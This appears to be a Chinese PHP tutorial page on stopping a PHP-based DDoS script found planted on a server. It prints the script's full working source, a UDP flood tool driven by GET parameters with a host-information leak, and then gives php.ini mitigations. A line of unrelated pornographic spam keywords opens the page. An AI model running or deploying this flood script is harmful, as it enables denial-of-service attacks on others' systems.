欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

php的ddos攻擊解決方法

 更新時(shí)間:2015年01月08日 09:22:20   投稿:shichen2014  
這篇文章主要介紹了php的ddos攻擊解決方法,實(shí)例分析了ddos攻擊程序的原理與針對(duì)性的解決方法,是非常實(shí)用的技巧,需要的朋友可以參考下

本文實(shí)例講述了php的ddos攻擊解決方法。分享給大家供大家參考。具體分析如下:

今天自己的一臺(tái)機(jī)器突然向外部發(fā)送大量數(shù)據(jù)包,可每秒到1G以上,雖然我用策略把UDP禁止包是發(fā)不出去但是很占cup啊,所以想到最后還是想辦法解決了.

先看源碼,代碼如下:

復(fù)制代碼 代碼如下:
<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);
 
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
        if (StrLen($_GET['rat'])<>0){
                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
                exit;
            }
        echo "Parameters can not be empty!";
        exit;
    }
 
for($i=0;$i<$Sendlen;$i++){
        $out .= "A";
    }
 
$max_time = time()+$exec_time;
 
while(1){
    $packets++;
    if(time() > $max_time){
        break;
    }
    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
        if($fp){
            fwrite($fp, $out);
            fclose($fp);
    }
}
 
echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

關(guān)鍵代碼在于如下:
復(fù)制代碼 代碼如下:
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);

方法很簡(jiǎn)單,向目標(biāo)主機(jī)發(fā)送UDP包,在加上定義無限死循環(huán),就會(huì)形成較大的壓力.

這個(gè)壓力是對(duì)于執(zhí)行這個(gè)腳本的服務(wù)器來說的,因?yàn)樗紫葘?duì)自身的網(wǎng)寬、CPU等資源造成大量占用,如果想用這個(gè)腳本對(duì)目標(biāo)站點(diǎn)形成壓力,需要在多個(gè)服務(wù)器上執(zhí)行該腳本,DDOS嘛,既然是用fsockopen請(qǐng)求外部,那就不讓他請(qǐng)求.

php.ini里設(shè)置,代碼如下:

復(fù)制代碼 代碼如下:
allow_url_fopen = Off

如果這樣他還是能發(fā)包,代碼如下:

extension=php_sockets.dll

改成

;extension=php_sockets.dll

重啟APACHE、IIS、NGINX,這樣就可以防止PHP DDOS發(fā)包了.

另外有網(wǎng)友說,讓腳本不允許設(shè)置為不超時(shí)很簡(jiǎn)單:

1. 把set_time_limit函數(shù)禁用

2. 啟用PHP的安全模式(safe_mode=on).

禁用socket函數(shù)可以把把socket模塊直接全部禁用也可以禁用fsockopen函數(shù),建議,由于socket常用于發(fā)送郵件找回密碼,因此建議開啟直接開啟安全模式,但是這樣的話,腳本每30秒超時(shí)一次,估計(jì)沒有哪個(gè)“黑客”寂寞到每30秒去點(diǎn)一下開始DDOS.

經(jīng)驗(yàn):這種問題一般是網(wǎng)站安全引起的,我們要注意網(wǎng)站的安全及服務(wù)器的安全,這樣就不容易被入侵了,如果會(huì)用macofee的朋友,對(duì)網(wǎng)站進(jìn)行限制一下就會(huì)更好一些.

希望本文所述對(duì)大家的php程序設(shè)計(jì)有所幫助。

相關(guān)文章

  • php使用pthreads v3多線程實(shí)現(xiàn)抓取新浪新聞信息操作示例

    php使用pthreads v3多線程實(shí)現(xiàn)抓取新浪新聞信息操作示例

    這篇文章主要介紹了php使用pthreads v3多線程實(shí)現(xiàn)抓取新浪新聞信息操作,結(jié)合實(shí)例形式分析了php使用pthreads多線程抓取新浪新聞信息具體實(shí)現(xiàn)步驟與操作技巧,需要的朋友可以參考下
    2020-02-02
  • PHP刪除數(shù)組中特定元素的兩種方法

    PHP刪除數(shù)組中特定元素的兩種方法

    今天小編就為大家分享一篇關(guān)于PHP刪除數(shù)組中特定元素的兩種方法,小編覺得內(nèi)容挺不錯(cuò)的,現(xiàn)在分享給大家,具有很好的參考價(jià)值,需要的朋友一起跟隨小編來看看吧
    2019-02-02
  • PHP中有關(guān)長整數(shù)的一些操作教程

    PHP中有關(guān)長整數(shù)的一些操作教程

    這篇文章主要給大家介紹了關(guān)于PHP中有關(guān)長整數(shù)的一些操作教程,文中通過示例代碼介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用PHP具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面來一起學(xué)習(xí)學(xué)習(xí)吧
    2019-09-09
  • php面向?qū)ο蟪绦蛟O(shè)計(jì)

    php面向?qū)ο蟪绦蛟O(shè)計(jì)

    在面向?qū)ο蟮某绦蛟O(shè)計(jì)(英語:Object-oriented programming,縮寫:OOP)中,對(duì)象是一個(gè)由信息及對(duì)信息進(jìn)行處理的描述所組成的整體,是對(duì)現(xiàn)實(shí)世界的抽象
    2022-11-11
  • PHP函數(shù)超時(shí)處理方法

    PHP函數(shù)超時(shí)處理方法

    這篇文章主要介紹了PHP函數(shù)超時(shí)處理方法,結(jié)合實(shí)例形式分析了基于register_shutdown_function的超時(shí)處理相關(guān)技巧,具有一定參考借鑒價(jià)值,需要的朋友可以參考下
    2016-02-02
  • PHP文件生成的圖片無法使用CDN緩存的解決方法

    PHP文件生成的圖片無法使用CDN緩存的解決方法

    這篇文章主要介紹了PHP文件生成的圖片無法使用CDN緩存的解決方法,這里的PHP生成圖片是指src地址是一個(gè)PHP文件的圖片,如果不做CDN,服務(wù)器的壓力會(huì)非常大,本文就講解了如何加進(jìn)CDN的方法,需要的朋友可以參考下
    2015-06-06
  • php遞歸函數(shù)中使用return的注意事項(xiàng)

    php遞歸函數(shù)中使用return的注意事項(xiàng)

    php遞歸函數(shù)中使用return的時(shí)候會(huì)碰到無法正確返回想要的值得情況,下面就來舉例子來說明一下吧
    2014-01-01
  • PHP模塊化安裝教程

    PHP模塊化安裝教程

    這篇文章主要介紹了PHP模塊化安裝的方法,較為詳細(xì)的分析了php模塊化安裝的步驟與相關(guān)注意事項(xiàng),具有一定參考借鑒價(jià)值,需要的朋友可以參考下
    2016-06-06
  • PHP中開啟gzip壓縮的2種方法

    PHP中開啟gzip壓縮的2種方法

    這篇文章主要介紹了PHP中開啟gzip壓縮的2種方法,本文介紹了php配置文件與開啟方法、php文件開啟方法,需要的朋友可以參考下
    2015-01-01
  • 詳解PHP接口簽名驗(yàn)證

    詳解PHP接口簽名驗(yàn)證

    工作中,我們時(shí)刻都會(huì)和接口打交道,有的是調(diào)取他人的接口,有的是為他人提供接口,在這過程中肯定都離不開簽名驗(yàn)證。本文將詳細(xì)介紹PHP接口簽名驗(yàn)證。
    2021-06-06

最新評(píng)論